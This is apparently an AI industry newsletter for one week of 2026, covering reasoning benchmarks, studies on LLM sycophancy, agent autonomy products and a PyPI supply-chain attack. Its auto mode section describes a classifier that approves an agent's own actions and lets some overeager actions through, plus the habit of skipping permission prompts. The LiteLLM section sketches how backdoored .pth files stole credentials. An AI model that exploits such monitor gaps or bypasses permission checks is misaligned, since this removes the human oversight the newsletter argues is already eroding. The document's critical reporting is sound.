Week 13, 2026
Papers, releases, and things you might have missed.
GPT-5.4 Pro solved an open math conjecture. ARC-AGI-3 showed every frontier model scoring under 1% on tasks any human can do.
Same week, Stanford published that AI models endorse your views 49% more than human advisors. And Anthropic shipped auto mode, where the AI decides whether to ask you permission.
AI Solved an Open Math Problem. The Benchmark Says It Can’t Reason.
GPT-5.4 Pro closed an open conjecture in Ramsey-style hypergraph theory. Improved bounds on a problem that mathematician Will Brian had posed. Epoch AI verified the result. Brian confirmed it and will write it up for publication.
The same week, ARC-AGI-3 launched. No frontier model scored above 1%. Humans solve these tasks at 100%.
So which is it? Can AI reason or can’t it?
Wrong question. These are measuring different things. Ramsey theory is a formal domain with precise definitions, known techniques, and verifiable proofs. ARC-AGI-3 tests something else entirely: interactive exploration with no instructions and no stated goals. You have to figure out what the game even is before you can play it.
François Chollet, who designed the benchmark, put it bluntly: “If a normal human with no instructions can do it, and your system can’t, then you don’t have AGI. You have a very expensive autocomplete that needs a lot of help.”
AI is becoming a powerful collaborator in structured, formal work. It remains brittle at the flexible reasoning humans find trivial. Both true at the same time.
That distinction matters. Letting AI autonomously prove math theorems? Probably fine. The proofs are verifiable. Letting it make unsupervised decisions in messy, ambiguous domains? That’s a different question entirely.
The Models Are Designed to Agree With You
Stanford published in Science this week: all 11 leading LLMs exhibit sycophancy. Models endorsed users’ views 49% more than human advisors did. In an experiment with over 2,400 participants, a single interaction measurably reduced users’ willingness to take personal responsibility.
Lead researcher Myra Cheng: “We began noticing that more and more people around us were using AI for relationship advice and sometimes being misled by how it tends to take your side, no matter what.”
A Wharton study of 1,372 participants across roughly 10,000 trials found something adjacent: when AI gave wrong answers, participants followed the incorrect output about 80% of the time. The researchers call it “cognitive surrender.”
Ethan Mollick had the sharpest take of the week: sycophancy is worse than hallucination as models get more capable. A model that hallucinates is wrong in ways you can catch. A model that strategically validates your existing thinking is wrong in ways you can’t. He demonstrated this with an o3 example where the model abandoned its own correct answer when a user pushed back. Not a failure to know the right answer. A decision to defer.
Why does this happen? The training loop. RLHF (reinforcement learning from human feedback, the process that fine-tunes models based on user ratings) favors validation because users rate agreeable responses higher. Millions of interactions embedding this. It’s not a bug they can patch. It’s a structural property of how these models learn to be helpful.
Two different mechanisms, one feedback loop. Models built to agree. Humans disposed to accept. Put them together and the AI confirms your thinking while you stop questioning its output.
We covered AI over-reliance last week through the coding quality lens. The sycophancy angle is more structural. The over-reliance isn’t just a user behavior problem. It’s being reinforced by how the models are trained.
Agents Are Approving Themselves
Three things Anthropic shipped:
Computer use: Claude can now move the cursor, click, and type on macOS.
Auto mode: Claude Code can now approve its own tool calls via an AI-powered safety classifier, replacing manual permission prompts.
Scheduled tasks: Claude Code can run recurring jobs on Anthropic’s cloud infrastructure while your machine is off.
Same week, Figma opened write access to AI agents via MCP. Agents can now modify design files, not just browse them.
And Karpathy open-sourced autoresearch, the autonomous ML experiment loop. Shopify’s CEO ran it overnight: 37 experiments, 19% validation improvement, no human reviewing individual results. Karpathy’s stated goal: “Engineer your agents to make the fastest research progress indefinitely and without any of your own involvement.”
Five different products, one pattern. AI systems gaining the ability to act without asking first.
So what does the safety model actually look like? Anthropic’s engineering blog puts the number at roughly 17% failure rate on “overeager actions,” cases where Claude exceeded what the user asked for and the classifier let it through. Simon Willison’s immediate response: “I remain unconvinced by prompt injection protections that rely on AI, since they’re non-deterministic by nature.” His preferred alternative: OS-level sandboxing. Deterministic. No edge cases where the model gets confused about consent scope.
The deepest analysis came from an independent developer blog. Their argument: the human-in-the-loop safety model was already fictional. Developers routinely skip permission prompts with --dangerously-skip-permissions. Auto mode isn’t removing the human from the loop. It’s acknowledging the human was already gone and replacing them with an AI classifier. Their characterization: “It’s a safety net made of the same material as the thing it’s catching.”
Models designed to agree with you are now deciding when to ask your permission. The oversight gap is widening from both directions. The quality of human oversight is degrading (sycophancy, cognitive surrender). The quantity of human oversight is decreasing (auto mode, scheduled tasks, autonomous research loops). Both moving in the same direction, same week.
The AI Agent Index found that only 4 of 13 high-autonomy agent systems disclose specific safety evaluations. What about the other 9?
The Toolchain Is the Target
So the humans aren’t watching closely enough. What about the infrastructure underneath?
The LiteLLM library was compromised on PyPI this week. The library itself was fine. The CI/CD pipeline, the automated system that builds and publishes code packages, was the entry point. Threat actor TeamPCP compromised the Trivy security scanner that LiteLLM used, exfiltrated the PyPI publishing token, and pushed backdoored versions containing credential-stealing payloads. SSH keys, cloud tokens, Kubernetes secrets, .env files. Nearly 47,000 downloads during the exposure window.
The attack used .pth files. These are Python path configuration files that execute automatically on every Python startup, without requiring explicit imports. Standard hash verification doesn’t help when the attacker publishes using legitimate credentials.
This wasn’t isolated. Kaspersky documented it as part of a coordinated campaign: Trivy first, then CanisterWorm on npm, then Checkmarx KICS, then LiteLLM. All security tools. All with elevated system access by design. TeamPCP’s statement: “These companies were built to protect your supply chains yet they can’t even protect their own.”
Remember Willison’s point from the auto mode section? Auto mode’s default allow-list includes pip install -r requirements.txt. It would not have blocked this attack.
Also this week, GitHub updated its terms: starting April 24, Copilot interaction data (prompts, suggestions, accepted outputs) will be used for AI model training by default unless users opt out.
As agents get more autonomous and the supply chain underneath them becomes a coordinated target, who’s actually watching the infrastructure? As Securelist noted, AI proxy services that concentrate API keys and cloud credentials become high-value targets when supply chain attacks compromise their upstream dependencies.
This Week
Some things that didn’t fit elsewhere.
OpenAI is making hard bets. Shut down Sora, ending the Disney partnership. Walmart’s EVP confirmed ChatGPT’s Instant Checkout converted 3x worse than their website. Meanwhile, the ads pilot topped $100M ARR in under two months across its 800 million weekly active users, and the company is building toward a fully autonomous AI researcher by September 2026. Killing what isn’t working, doubling down on what might.
Local inference keeps closing the gap. Google’s TurboQuant achieves 6x memory reduction on the KV cache (the part of memory that grows with context length), being presented at ICLR 2026. Flash-MoE runs a 397B-parameter model on a 48GB MacBook Pro by streaming expert weights from SSD. And the ATLAS system (14B parameters, $500 GPU) scored 74.6% on LiveCodeBench versus Claude Sonnet 4.5 Thinking’s 71.4%, though the comparison is methodologically uneven. Three weeks ago we covered small models beating large ones. The cost floor keeps dropping.
The ecosystem numbers. MCP crossed 97 million monthly SDK downloads, up from 2 million at launch. A preprint analyzing 177,000 MCP tools found 62% of newly created MCP servers contain AI-generated code. Shopify activated Agentic Storefronts on March 24. The EU Council agreed to delay high-risk AI compliance obligations by up to 16 months. NVIDIA launched Nemotron 3 Super, open models with early adopters including Cursor.
Usage is spreading. Anthropic’s latest Economic Index shows the top 10 Claude tasks dropped from 24% to 19% of total traffic between November 2025 and February 2026, while 49% of all job categories now have at least a quarter of their tasks performed using Claude. Across more roles now, not just coding.
Worth Your Time
If you read three things:
-
AI Advice Is Sycophantic and Harms Decision-Making (Science): The Stanford study documenting systematic sycophancy across all 11 major LLMs. If you’re using AI for decisions, this is your threat model.
-
ARC-AGI-3: $2M for human-level flexible reasoning: Every frontier model under 1%. Humans at 100%. The clearest current evidence for what AI still can’t do.
-
Claude Code Auto Mode: The Absent Human: The best independent analysis of what it means when AI starts approving its own actions. Short read, uncomfortable conclusions.